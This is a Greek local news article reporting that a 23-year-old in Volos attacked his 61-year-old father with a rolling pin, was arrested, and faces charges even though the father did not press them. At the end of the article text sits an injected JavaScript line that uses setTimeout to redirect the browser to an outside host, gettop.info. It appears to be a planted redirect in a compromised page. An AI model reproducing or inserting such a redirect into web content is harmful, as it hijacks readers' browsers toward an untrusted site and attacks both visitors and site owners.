Επιτέθηκε στον πατέρα του με πλάστη

0
2

 

Επισκέφτηκε τον πατέρα του για να του ζητήσει κάτι που ήθελε και όταν εκείνος αρνήθηκε να ικανοποιήσει το αίτημά του, τότε του επιτέθηκε με έναν πλάστη που βρήκε στο γραφείο.

Εκτός εαυτού ο 23χρονος άρχισε να χτυπά τον πατέρα του αλύπητα, σε διάφορα σημεία του σώματός του, στη μέση, στο κεφάλι και δεν σταμάτησε παρά μόνο, όταν κατέφθασαν στο γραφείο οι αστυνομικοί του Τμήματος Βόλου, σύμφωνα με το taxydromos.gr.

Το περιστατικό συνέβη προχθές, γύρω στις 7.30 το απόγευμα, και προκάλεσε μεγάλη αναστάτωση. Κόσμος που περνούσε έξω από το ισόγειο γραφείο που είχε θέα στο δρόμο, αλλά και το προσωπικό του επαγγελματία, πανικοβλήθηκαν.

Ευαισθητοποιημένος πολίτης τηλεφώνησε στο Αστυνομικό Τμήμα Βόλου και καλούσε σε βοήθεια. Επί τόπου κατέφθασαν αστυνομικοί, οι οποίοι προχώρησαν στη σύλληψη του 23χρονου.

Προς τραγική διαπίστωση της Αστυνομίας, ο δράστης ήταν ο γιος του επαγγελματία, ο οποίος βρισκόταν σε κατάσταση εκτός ελέγχου.

Ο πατέρας του νεαρού, ηλικίας 61 ετών, σύμφωνα με πληροφορίες, μετέβη στο Γενικό Νοσοκομείο Βόλου για την παροχή των πρώτων βοηθειών, καθώς έφερε τραύματα από τα χτυπήματα.

Δεν ζήτησε ωστόσο, σύμφωνα με πληροφορίες του taxydromos.gr, την ποινική δίωξη του γιού του. Ο νεαρός ήταν σε κατάσταση εκτός ελέγχου. Ηταν φοβερά στεναχωρημένος και ταραγμένος, αλλά δεν ήθελε και την τιμωρία του παιδιού του.

Ωστόσο, το αδίκημα των ενδοοικογενειακών σωματικών βλαβών διώκεται αυτεπάγγελτα. Η Διεύθυνση Αστυνομίας Μαγνησίας σχημάτισε δικογραφία κατά του 23χρονου για σωματικές βλάβες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here